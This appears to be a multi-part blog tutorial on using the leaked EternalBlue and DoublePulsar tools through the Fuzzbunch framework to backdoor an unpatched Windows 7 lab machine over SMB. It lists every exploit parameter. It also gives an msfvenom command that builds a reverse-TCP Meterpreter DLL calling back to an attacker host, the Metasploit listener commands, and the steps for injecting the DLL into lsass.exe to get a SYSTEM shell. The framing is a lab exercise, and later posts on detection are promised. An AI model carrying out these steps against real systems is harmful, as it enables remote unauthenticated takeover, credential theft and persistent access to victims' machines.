From git clone to Pwned — Owning Windows with DoublePulsar and EternalBlue

By now, you’ve likely heard about the Shadow Brokers and their alleged NSA tool dump. Regardless of whether you believe it was or was not the toolset of a nation-state actor, at least one thing is true: this stuff works, and it works well.

In this blog series I’ll walk through some of what I’ve learned from the dump, focusing specifically on two tools: 

, a tool for backdooring Windows via MS17-010, and 

, an exploit that allows you to inject DLLs through the established backdoor, or inject your own shellcode payload. In this first post, we’ll walk through setting up the environment and getting the front-end framework, Fuzzbunch, to run.

tl;dr — sweet nation-state level hax, remote unauthenticated attacks that pop shells as NT AUTHORITY\System. Remember MS08-067? Yeah, like that.

Setting up the environment

1. To get going, fire up a Windows 7 host in a virtual machine. Dont worry about the specs; all of my research and testing has been done in a Virtualbox VM with 1GB ram, 1 CPU core, and a 25GB hard drive.
2. First and foremost, git clone (or download the zip) of the Shadowbrokers Dump. You should be able to grab it from x0rz’ github.
3. The exploits run through a framework not entirely unlike Metasploit. The framework itself runs in Python, so we need to grab a copy of Python 2.6 for Windows. If you catch yourself wondering why you’re installing a 9 year old copy of Python, remember that the dump is from 2013, and the tools had been in use for a while. Fire up the DeLorean because we’re about to go way back.
4. Add Python to your environmental path by going to 
   Control Panel > System > Advanced System Settings > Environmental Variables

    and add 

   C:\Python26

    to the PATH field.

5. Because you’re running Python on Windows, there are a bunch of dependencies you’ll need to install. The easiest way to overcome this is to install the Python for Windows Extensions, also known as PyWin. Grab a copy of PyWin 2.6 here.
6. PyWin will very likely fail on its final step. No problem: open an administrator command prompt, 
   cd C:\python26\scripts

    and run 

   python pywin32_postinstall.py --install

   . Python and its dependencies should now be installed.

7. We’re now ready to launch the Fuzzbunch Framework. Navigate to the folder you downloaded the exploits, and 
   cd windows

   . You’ll need to create a folder called listeningposts or the next step will fail; so, 

   mkdir listeningposts

   .

8. You should now be able to launch Fuzzbunch — use 
   python fb.py

    to kick it off.

Thats about it to get the software running. You’ll be asked a few questions, such as your Target IP, Callback IP (your local IP address), and whether you want to use Redirection. For now, choose no. Fuzzbunch will ask for a Logs directory — this is a pretty cool feature that stores your attack history and lets you resume from where you left off. Create a Logs directory somewhere.

At this point I’d encourage you to explore the interface; its fairly intuitive, sharing many commands with Metasploit (including 

 and 

 — hint hint). In the next post, we’ll launch an actual attack through Meterpreter and Powershell Empire DLLs.

By now, your environment is configured, you’ve been able to launch the Fuzzbunch framework, and you’re probably ready to hack something. In this article we’ll go through the process of using EternalBlue to create a backdoor. I’m going to make the following assumptions:

1. You have configured a local VM network with 1 Windows attack machine and 1 Windows 7 victim machine.
2. You have gone through the first blog post and can launch the Fuzzbunch framework.
3. You have basic command of the Windows operating system and command line.

For reference, in my lab environment, this is the setup:

1. Attacker Box — 10.0.2.5. Windows 7 SP1 x64.
2. Kali Box — 10.0.2.15. Kali Rolling. (We’ll use this in Part 3)
3. Victim Box — 10.0.2.7. Windows 7 SP1 x64, without the MS17-010 patches applied.

In the next tutorial we’re going to use the DLL injection function in DoublePulsar — however, the first step in this process is to backdoor the Victim with Eternal Blue. Launch Fuzzbunch, and enter the following:

If you have run Fuzzbunch in the past, you may see a list of projects. If this is your first run, you’ll see a prompt to select or create a new project. Select 

 to create a new project. Give it a name, and you should see something like this:

Time to backdoor our Windows box. Remember that exploits run through EternalBlue (the backdoor itself), so this is a critical step.

1. Type 
   use eternalblue
2. Fuzzbunch populates your options with defaults. The good news is, this is mostly correct out of the box. It’ll ask if you want to be prompted for variables — lets go through this, as there is one default we’re going to change. Types 
   yes

    or hit enter to continue.

3. NetworkTimeout [60]:

    This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.

4. TargetIP [10.0.2.7]:

    This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.

5. TargetPort [445]:

    EternalBlue targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.

6. VerifyTarget [True]:

    You can set this to 

   False

    to speed things up — but its a good idea to verify the target exists and is vulnerable before firing things off.

7. VerifyBackdoor [True]:

    Verify that your backdoor exploit actually succeeds.

8. MaximumExploitAttempts [3]:

    How many times should EternalBlue attempt to install the backdoor? I have seen EternalBlue fail the first attempt and succeed the second — so I’d recommend leaving it at 3.

9. GroomAllocations [12]:

    The number of SMB Buffers to use. Accept the defaults.

10. Target [WIN72K8R2]:

     In our example, we’re targetting Windows 7. If you’re using XP, select the appropriate option.

11. Mode :: Delivery Mechanism [FB]:

     We’re going to use Fuzzbunch. In a future post, we’ll discuss DARINGNEOPHYTE.

12. Fuzzbunch Confirmation:

     This confirms that you want to use Fuzzbunch.

13. Destination IP [10.0.2.7]:

     This is for your local tunnel. In our example, keep it as default

14. Destination Port [445]:

     As per above, this is for your local tunnel. Accept the default.

15. You should now see a summary of the configured EternalBlue module, as seen below:
    

    

Everything look good? Hit enter, and we’ll see Fuzzbunch backdoor the victim machine. This happens quick, but the authors have made a point of a celebratory =-=-=WIN=-=-= banner.

Here’s the exploit in its entirety, from answering 

 to a successful backdoor.

Note that EternalBlue checks for the existance of a backdoor before continuing. If you see =-=-=-=-=WIN=-=-=-=-= toward the end, and a green 

 message then congratulations! You’ve just launched a nation state exploit against an unsuspecting lab machine. I’d suggest running through these steps again, right away, to see how things play out when you try to backdoor a box that has already been backdoored with EternalBlue. In the next post, we’ll pop a Meterpreter shell as NT Authority\System in minutes flat.

To recap where we are so far: You’ve installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you’ve backdoored your Victim box. You have a Windows Attack box, a Windows Victim Box, and a Kali box — and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn’t describe your situation. Otherwise, lets hack things.

Now that we have a backdoor installed, we’re going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as 

, the equivalent of root on a Windows box. For this section of the process, I’ll assume the following:

1. You are familiar with the Linux command line.
2. You have basic familairity with Metasploit, specifically the 
   msfconsole

    and 

   msvenom

    tools. If you arent familiar with these, Offensive Security’s Metasploit Unleashed is a great primer available for free.

3. You have backdoored your Victim box successfully.

Creating the Meterpreter payload and starting your Kali listener
Let’s start by creating a malicious DLL file. The DLL we create is going to run the payload 

 which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

1. Use the following command to generate the DLL: 
   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll

   . This uses the payload mentioned, connecting back to 10.0.2.15, on port 9898. It uses the DLL format and outputs the payload to a file called 

   meterpreter.dll

   .

2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run 
   python -m SimpleHTTPServer

    on your Kali box, and use a web browser from the Windows Attack box to browse to 

   http://10.0.2.15:8000

    and download it directly.

3. Start up 
   msfconsole

    on Kali and 

   use exploit/multi/handler

   . We’re going to catch our shell here — so use the parameters you set in the DLL by typing 

   set LPORT 9898

   . You can probably get away without setting the LHOST, but if you want to be sure, type 

   set LHOST 10.0.2.15

    as well. Finally, I had some issues with the exploit failing when I didnt set a payload manually. Avoid that by typing 

   set PAYLOAD windows/x64/meterpreter/reverse_tcp

   . Lastly, type 

   exploit

    to start your listener. Lots of info in this step, so here’s what you should see:

1. If everything looks good, its time to go back to the Windows Attack box. Fire up Fuzzbunch if its not already running, and 
   use doublepulsar

   .

Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We’re going to change things, so when you see 

, hit enter.

1. NetworkTimeout [60]:

    This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.

2. TargetIP [10.0.2.7]:

    This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.

3. TargetPort [445]:

    DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.

4. Protocol:

    Since we’re using SMB here, make sure SMB is selected.

5. Architecture:

    Make sure you have this set correctly. If you use x86 on an x64 box, you’ll get a blue screen of death.

6. Function:

    DoublePulsar can run shellcode, or run a DLL. Select 

   2

    to Run a DLL.

7. DllPayload []:

    This is the full path to your Meterpreter DLL; for example, C:\temp\meterpreter.dll

8. DllOrdinal [1]:

    DLL files call functions by ordinal numbers instead of names. Unfortunately this is out of my scope of knowledge — in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you’ll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.

9. ProcessName [lsass.exe]:

    The process name you’ll inject into. This is your call — pick something run as NT Authority\System, that is also unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default — this works fine, but some Meterpreter actions (such as 

   hashdump

   ) will likely cause it to crash. You can consider 

   spoolsv.exe

   , 

   SearchIndexer.exe

   , and 

   lsm.exe

    as well — experiement a bit with this field.

10. ProcessCommand []:

     Optional, the process command line to inject into. Leave this blank.

11. Destination IP [10.0.2.7]:

     Local tunnel IP. For this scenario, leave it as default.

12. Destination Port [445]:

     Local tunnel port. Again, we’ll leave this default.

You should now have a summary of the changes you’ve made, which should look like this:

If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check on the EternalBlue backdoor, and inject the DLL. You should see a 

 message. Here’s what the attack looks like from your Windows box:

And now the good part — open up your Kali box. If everything has gone well, you’ve now got a meterpreter session open, and you should have 

. w00t!

In the next post, we’ll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are event viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.